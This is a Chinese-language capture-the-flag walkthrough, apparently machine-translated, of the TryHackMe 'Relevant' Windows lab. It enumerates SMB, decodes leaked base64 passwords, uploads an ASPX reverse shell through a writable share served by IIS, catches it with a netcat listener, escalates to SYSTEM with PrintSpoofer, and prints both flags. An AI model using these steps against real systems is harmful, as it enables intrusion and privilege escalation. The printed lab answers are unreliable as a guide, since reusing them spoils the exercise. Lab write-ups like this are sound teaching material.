关于安全:TryhackmeRelevant

72次阅读

共计 4772 个字符,预计需要花费 12 分钟才能阅读完成。

服务发现

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.10.150.167 -p-                                                                                                                                                                                                    255 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-09 04:20 EDT
Nmap scan report for 10.10.150.167
Host is up (0.32s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 448.90 seconds

剖析

80 和 49663 都开启了 http 服务,目录爆破没有发现什么乏味的货色
445 貌似存在永恒之蓝破绽,然而没有攻打胜利

samba 枚举, 提醒在 \10.10.150.167\nt4wrksv 里有一个 passwords.txt 文件

┌──(root💀kali)-[~/tryhackme]
└─# nmap --script "safe or smb-enum-*" -p 445 10.10.207.135 > smb.txt

smb-enum-shares: 
|   account_used: guest
|   \\10.10.150.167\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.150.167\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.150.167\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.150.167\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
| smb-ls: Volume \\10.10.150.167\nt4wrksv
| SIZE   TIME                 FILENAME
| <DIR>  2020-07-25T15:10:05  .
| <DIR>  2020-07-25T15:10:05  ..
| 98     2020-07-25T15:13:05  passwords.txt
|_

匿名连贯 //10.10.150.167/nt4wrksv , 下载 passwords.txt 文件

──(root💀kali)-[~]
└─# smbclient  //10.10.150.167/nt4wrksv                                                                                                                                                                                                 1 ⨯
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  8 06:09:40 2021
  ..                                  D        0  Wed Sep  8 06:09:40 2021
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 5137057 blocks available

smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> ^C

本地关上 passwords.txt 文件,是一个加密的用户账号密码

┌──(root💀kali)-[~]
└─# cat passwords.txt 
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 

看开端有两个 == 号,猜想是 base64 加密,放到 hackbar 里解密

 加密串:Qm9iIC0gIVBAJCRXMHJEITEyMw==  

解密:Bob - !P@$$W0rD!123

加密串:QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 
解密:Bill - Juw4nnaM4n420696969!$$$

所以这两个是什么服务的账号密码?

因为开了 3389 端口,认为是近程连贯的账号,尝试连贯,然而都失败了

然而关上 http://10.10.150.167:49663/nt…,同样能够拜访到下面的信息,阐明分享的目录在 iss 能够拜访的目录内,也就是说能够通过上传一个 asp 文件,拿到反弹的 shell

胜利上传一个 asp 文件,payload 见:https://github.com/borjmz/asp…

┌──(root💀kali)-[~]
└─# smbclient  //10.10.150.167/nt4wrksv 
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.       
smb: \> put /root/tryhackme/rev
reverse_shell.apsx  revse_shell.php       
smb: \> put /root/tryhackme/reverse_shell.apsx ./shell.aspx
putting file /root/tryhackme/reverse_shell.apsx as \shell.aspx (11.7 kb/s) (average 11.7 kb/s)
smb: \> ls
  .                                   D        0  Thu Sep  9 04:33:54 2021
  ..                                  D        0  Thu Sep  9 04:33:54 2021
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
  shell.aspx                          A    15492  Thu Sep  9 04:33:55 2021

                7735807 blocks of size 4096. 5134626 blocks available
smb: \> 

拜访 http://10.10.150.167:49663/nt…,拿到一个反弹 shell

┌──(root💀kali)-[~/tryhackme]
└─# nc -lnvp 1234                                                                                                                                                                                                                     130 ⨯
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.150.167] 49893
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>

拿到 userflag

c:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

运行 whoami /priv 查看以后用户在零碎中的权限

PS C:\inetpub\wwwroot\nt4wrksv> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

以后用户启用了 SeImpersonatePrivilege,意味着能够利用令牌模仿来晋升权限

从 https://github.com/itm4n/Prin… 下载 64 位的 PrintSpoofer64.exe,而后通过 smb 上传到 windows 靶机

提权

PS C:\inetpub\wwwroot\nt4wrksv> .\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

拿到 root flag

PS C:\users\administrator\desktop> type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
PS C:\users\administrator\desktop> 

正文完
 0